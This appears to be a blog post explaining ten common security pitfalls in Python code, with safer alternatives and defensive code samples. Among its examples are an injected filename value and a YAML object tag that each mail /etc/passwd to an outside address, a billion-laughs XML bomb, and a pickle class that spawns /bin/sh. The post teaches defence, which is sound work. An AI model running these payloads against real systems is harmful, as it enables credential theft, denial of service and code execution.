Writing secure code is hard. When you learn a language, a module or a framework, you learn how it is supposed to be used. When thinking about security, you need to think about how it can be misused. Python is no exception: even within the standard library there are documented bad practices for writing hardened applications. Yet many of the Python developers I’ve spoken to simply aren’t aware of them.
Here are my top 10, in no particular order, common gotchas in Python applications.
Injection attacks are broad and really common and there are many types of injection. They impact all languages, frameworks and environments.
SQL injection is where you’re writing SQL queries directly instead of using an ORM and mixing your string literals with variables. I’ve read plenty of code where “escaping quotes” is deemed a fix. It isn’t. Familiarise yourself with all the complex ways SQL injection can happen with this cheatsheet.
Command injection is anytime you’re calling a process using popen, subprocess, os.system and taking arguments from variables. When calling local commands there’s a possibility of someone setting those values to something malicious.
Imagine this simple script [credit]. You call a subprocess with the filename as provided by the user:
    import subprocess

    def transcode_file(request, filename):
        command = 'ffmpeg -i "{source}" output_file.mpg'.format(source=filename)
        subprocess.call(command, shell=True)  # a bad idea!
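The attacker sets the value of filename to "; cat /etc/passwd | mail them@domain.com or something equally dangerous. Because the command runs through a shell, the injected text is interpreted as shell syntax rather than as a filename.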
Sanitise input using the utilities that come with your web framework, if you’re using one. Unless you have a good reason, don’t construct SQL queries by hand. Most ORMs have builtin sanitization methods.
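If you do need to write SQL by hand, a parameterized query keeps the values out of the SQL text. Here is a minimal sketch using the standard library's sqlite3 module; the users table and the find_user helper are made up for illustration, and other database drivers use different placeholder styles.

```python
import sqlite3


def find_user(conn, username):
    """Look up users by name with a parameterized query."""
    # The "?" placeholder passes the value separately from the SQL text,
    # so quotes in `username` are treated as data rather than as SQL.
    cursor = conn.execute(
        "SELECT id, name FROM users WHERE name = ?", (username,)
    )
    return cursor.fetchall()


# Hypothetical in-memory table, for illustration only.
conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT)")
conn.execute("INSERT INTO users (name) VALUES (?)", ("alice",))

rows = find_user(conn, "alice")
injected = find_user(conn, "alice' OR '1'='1")
```

The classic injection string simply fails to match any name, because it never becomes part of the query itself.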
For the shell, use the shlex module to escape input correctly.
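As a rough sketch of both options for the ffmpeg example: passing an argument list avoids the shell entirely, and shlex.quote escapes a value when a shell command string really is unavoidable. The helper names here are my own, not part of any library.

```python
import shlex


def build_transcode_args(filename):
    """Build an argument list; no shell is involved, so nothing is parsed."""
    return ["ffmpeg", "-i", filename, "output_file.mpg"]


def build_shell_command(filename):
    """Build a shell string with the filename quoted as one literal word."""
    return "ffmpeg -i {} output_file.mpg".format(shlex.quote(filename))


malicious = '"; cat /etc/passwd | mail them@domain.com'

args = build_transcode_args(malicious)
command = build_shell_command(malicious)

# To actually run it, prefer the list form and leave shell=True off:
# subprocess.call(args)
```

In both cases the malicious value ends up as a single (nonexistent) filename instead of extra shell syntax.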
If your application ever loads and parses XML files, the odds are you are using one of the XML standard library modules. There are a few common attacks through XML, mostly DoS-style (designed to crash systems rather than exfiltrate data). Those attacks are common, especially if you’re parsing external (i.e. non-trusted) XML files.
One of those is called “billion laughs”, because the payload normally contains a lot (billions) of “lols”. Basically, the idea is that XML entities can reference other entities, so when your unassuming XML parser tries to load this XML file into memory it consumes gigabytes of RAM. Try it out if you don’t believe me :-)
<?xml version="1.0"?><!DOCTYPE lolz [<!ENTITY lol "lol"><!ENTITY lol2 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;"><!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;"><!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;"><!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;"><!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;"><!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;"><!ENTITY lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;"><!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;">]><lolz>&lol9;</lolz>
Another attack uses external entity expansion. XML supports referencing entities from external URLs, and the XML parser would typically fetch and load that resource without any qualms. “An attacker can circumvent firewalls and gain access to restricted resources as all the requests are made from an internal and trustworthy IP address, not from the outside.”
Another situation to consider is 3rd party packages you’re depending on that decode XML, such as configuration files or remote APIs. You might not even be aware that one of your dependencies leaves itself open to these types of attacks.
So what happens in Python? Well, the standard library modules, etree, DOM, xmlrpc are all wide open to these types of attacks. It’s well documented: https://docs.python.org/3/library/xml.html#xml-vulnerabilities
Use defusedxml as a drop-in replacement for the standard library modules. It adds safe-guards against these types of attacks.
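With defusedxml the change is usually just the import, for example parsing through defusedxml.ElementTree instead of xml.etree.ElementTree. To illustrate the kind of safeguard involved, here is a standard-library-only sketch that rejects any document declaring an entity before expansion can happen. This is my own simplified illustration, not defusedxml's actual implementation, and the names are hypothetical.

```python
from xml.parsers import expat


class EntitiesForbidden(ValueError):
    """Raised when a document declares an XML entity."""


def check_no_entities(data):
    """Parse `data` and raise EntitiesForbidden on any entity declaration."""
    parser = expat.ParserCreate()

    def on_entity_decl(name, *rest):
        # Called for every <!ENTITY ...> declaration; we refuse them all.
        raise EntitiesForbidden(
            "entity declaration not allowed: {}".format(name)
        )

    parser.EntityDeclHandler = on_entity_decl
    parser.Parse(data, True)


# A deliberately tiny two-level version of the billion laughs payload.
SMALL_BOMB = (
    b'<?xml version="1.0"?>'
    b'<!DOCTYPE lolz [<!ENTITY lol "lol"><!ENTITY lol2 "&lol;&lol;">]>'
    b"<lolz>&lol2;</lolz>"
)

try:
    check_no_entities(SMALL_BOMB)
    bomb_rejected = False
except EntitiesForbidden:
    bomb_rejected = True
```

Ordinary documents without a DTD pass through untouched; for real applications the maintained library is the better choice over a hand-rolled check like this.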
Don’t use assert statements to guard pieces of code that a user shouldn’t access. Take this simple example:

    def foo(request, user):
        assert user.is_admin, "user does not have access"
        # secure code follows...
Now, by default Python executes with __debug__ as true, but in a production environment it’s common to run with optimizations (the -O flag or the PYTHONOPTIMIZE environment variable). This strips the assert statement, so execution goes straight to the secure code regardless of whether the user is_admin or not.
Only use assert statements to communicate with other developers, such as in unit tests or to guard against incorrect API usage.
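For the access check itself, an explicit condition that raises an exception keeps working whatever flags the interpreter runs with. A minimal sketch, where the User class and the return value are stand-ins for illustration:

```python
class User:
    """Hypothetical stand-in for a framework's user object."""

    def __init__(self, is_admin):
        self.is_admin = is_admin


def foo(request, user):
    # An ordinary if/raise is never stripped by -O, unlike assert.
    if not user.is_admin:
        raise PermissionError("user does not have access")
    return "secure result"


try:
    foo(None, User(is_admin=False))
    denied = False
except PermissionError:
    denied = True
```

In a web framework you would more likely raise whatever exception it maps to a 403 response.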
Timing attacks are essentially a way of exposing the behaviour and algorithm by timing how long it takes to compare provided values. Timing attacks require precision, so they don’t typically work over a high-latency remote network. Because of the variable latency involved in most web applications, it’s very hard to mount a timing attack against HTTP web servers.
But if you have a command-line application that prompts for the password, an attacker can write a simple script to time how long it takes to compare their value with the actual secret.
There are some impressive examples such as this SSH-based timing attack written in Python if you want to see how they work.
Use secrets.compare_digest, introduced in Python 3.6, to compare passwords and other private values. On older versions, hmac.compare_digest (available since Python 3.3) does the same job.
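A short sketch of a constant-time comparison; the token_matches helper and the example values are hypothetical. Encoding to bytes first means non-ASCII input is handled as well.

```python
import secrets


def token_matches(provided, expected):
    """Compare two secret strings without short-circuiting on a mismatch."""
    # A plain == can return as soon as one character differs;
    # compare_digest is designed so its timing does not reveal where.
    return secrets.compare_digest(
        provided.encode("utf-8"), expected.encode("utf-8")
    )


ok = token_matches("s3cret-token", "s3cret-token")
bad = token_matches("s3cret-tokeN", "s3cret-token")
```

Note that the comparison can still leak information about the length of the values, just not their contents.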
Python’s import system is very flexible, which is great when you’re trying to write monkey-patches for your tests, or overload core functionality.
But, it’s one of the biggest security holes in Python.
Installing 3rd party packages into your site-packages, whether in a virtual environment or the global site-packages (which is generally discouraged), exposes you to security holes in those packages.
There have been occurrences of packages being published to PyPI with similar names to popular packages, but instead executing arbitrary code. The biggest incident luckily wasn’t harmful and just “made a point” that the problem is not really being addressed.
Another situation to think about is the dependencies of your dependencies (and so forth). They could include vulnerabilities and they could also override default behaviour in Python via the import system.
Vet your packages. Look at PyUp.io and their security service. Use virtual environments for all applications and ensure your global site-packages is as clean as possible. Check package signatures.
To create temporary files in Python, you’d typically generate a file name using the [mktemp()](https://docs.python.org/3/library/tempfile.html#tempfile.mktemp "tempfile.mktemp") function and then create a file using this name. “This is not secure, because a different process may create a file with this name in the time between the call to [mktemp()](https://docs.python.org/3/library/tempfile.html#tempfile.mktemp "tempfile.mktemp") and the subsequent attempt to create the file by the first process.” [1] This means an attacker could trick your application into either loading the wrong data or exposing other temporary data.
Recent versions of Python will raise a runtime warning if you call the incorrect method.
Use the tempfile module and use mkstemp if you need to generate temporary files.
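A minimal sketch of the safer pattern: mkstemp creates the file and hands back an already-open descriptor, so there is no gap between choosing the name and creating the file. The write_temp helper and the ".tmp" suffix are my own choices for illustration.

```python
import os
import tempfile


def write_temp(data):
    """Create a temporary file atomically and write `data` to it."""
    # mkstemp returns an open file descriptor plus the path it created.
    fd, path = tempfile.mkstemp(suffix=".tmp")
    with os.fdopen(fd, "wb") as handle:
        handle.write(data)
    return path


path = write_temp(b"scratch data")
with open(path, "rb") as handle:
    contents = handle.read()

# mkstemp does not clean up after itself; removing the file is on us.
os.remove(path)
```

If you don't need the path to outlive the block, tempfile.NamedTemporaryFile or tempfile.TemporaryFile handle the cleanup for you.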
To quote the PyYAML documentation:
“Warning: It is not safe to call **yaml.load** with any data received from an untrusted source! **yaml.load** is as powerful as **pickle.load** and so may call any Python function.”
This beautiful example was found in the popular Python project Ansible. You could provide Ansible Vault with this value as the (valid) YAML. It calls os.system() with the arguments provided in the file.
!!python/object/apply:os.system ["cat /etc/passwd | mail me@hack.c"]
So, effectively loading YAML files from user-provided values leaves you wide-open to attack.
Demo of this in action, credit Anthony Sottile
Use yaml.safe_load pretty much always, unless you have a really good reason.
Deserializing pickle data is just as bad as YAML. Python classes can declare a magic method called __reduce__ which returns a string, or a tuple with a callable and the arguments to call it with when unpickling. The attacker can use that to include references to the subprocess module to run arbitrary commands on the host.
This wonderful example shows how to pickle a class that opens a shell in Python 2. There are plenty more examples of how to exploit pickle.
    import cPickle
    import subprocess
    import base64

    class RunBinSh(object):
        def __reduce__(self):
            return (subprocess.Popen, (('/bin/sh',),))

    print base64.b64encode(cPickle.dumps(RunBinSh()))
Never unpickle data from an untrusted or unauthenticated source. Use another serialization pattern instead, like JSON.
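As a small sketch of the JSON alternative: parsing JSON only ever produces plain data (dicts, lists, strings, numbers, booleans and None), so there is no hook for running code on load. The function names and the "must be an object" rule are assumptions for illustration.

```python
import json


def serialize(state):
    """Turn a plain dict into a JSON string."""
    return json.dumps(state)


def deserialize(payload):
    """Parse JSON and check we got the shape we expected."""
    data = json.loads(payload)
    # Parsing is safe, but the contents are still untrusted input.
    if not isinstance(data, dict):
        raise ValueError("expected a JSON object")
    return data


restored = deserialize(serialize({"user": "alice", "roles": ["admin"]}))
```

The trade-off is that custom classes don't round-trip automatically; you rebuild them explicitly from the validated data.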
Most POSIX systems come with a version of Python 2. Typically an old one.
Since “Python”, i.e. CPython, is written in C, there are times when the Python interpreter itself has holes. Common security issues in C are related to the allocation of memory, such as buffer overflow errors.
CPython has had a number of overrun or overflow vulnerabilities over the years, each of which has been patched and fixed in subsequent releases.
So you’re safe. That is, if you patch your runtime.
Here’s an example from 2.7.13 and below, an integer overflow vulnerability that enables code execution. That’s pretty much any un-patched version of Ubuntu pre-17.
Install the latest version of Python for your production applications, and patch it!
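One cheap safeguard is to have the application check the interpreter version at startup. A rough sketch follows; the minimum version below is a placeholder, not a recommendation, so pick whatever patched release applies to you.

```python
import sys

# Hypothetical minimum; set this to the patched release you require.
MINIMUM_VERSION = (3, 8, 0)


def runtime_is_current(minimum=MINIMUM_VERSION, actual=None):
    """Return True if the interpreter is at least the `minimum` version."""
    if actual is None:
        actual = sys.version_info[:3]
    # Tuples compare element by element: major, then minor, then micro.
    return tuple(actual) >= tuple(minimum)


# At startup you might refuse to run on an outdated interpreter:
# if not runtime_is_current():
#     raise SystemExit("Python runtime is too old; please upgrade")
```

This only catches an outdated runtime; it doesn't replace actually applying the patches.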
Similar to not patching your runtime, you also need to patch your dependencies regularly.
I find the practice of “pinning” versions of Python packages from PyPI in packages terrifying. The idea is that “these are the versions that work” so everyone leaves it alone.
All of the vulnerabilities in code I’ve mentioned above are just as important when they exist in packages that your application uses. Developers of those packages fix security issues. All the time.
Use a service like PyUp.io to check for updates, raise pull/merge requests to your application and run your tests to keep the packages up to date.
Use a tool like InSpec to validate the installed versions on production environments and ensure minimal versions or version ranges are patched.
There’s a great static linter that will catch all of these issues in your code, and more!
It’s called bandit. Just run pip install bandit and then bandit -r ./codedir
PyCQA/bandit: Bandit is a tool designed to find common security issues in Python code. (github.com)
Credit to Red Hat for this great article that I used in some of my research.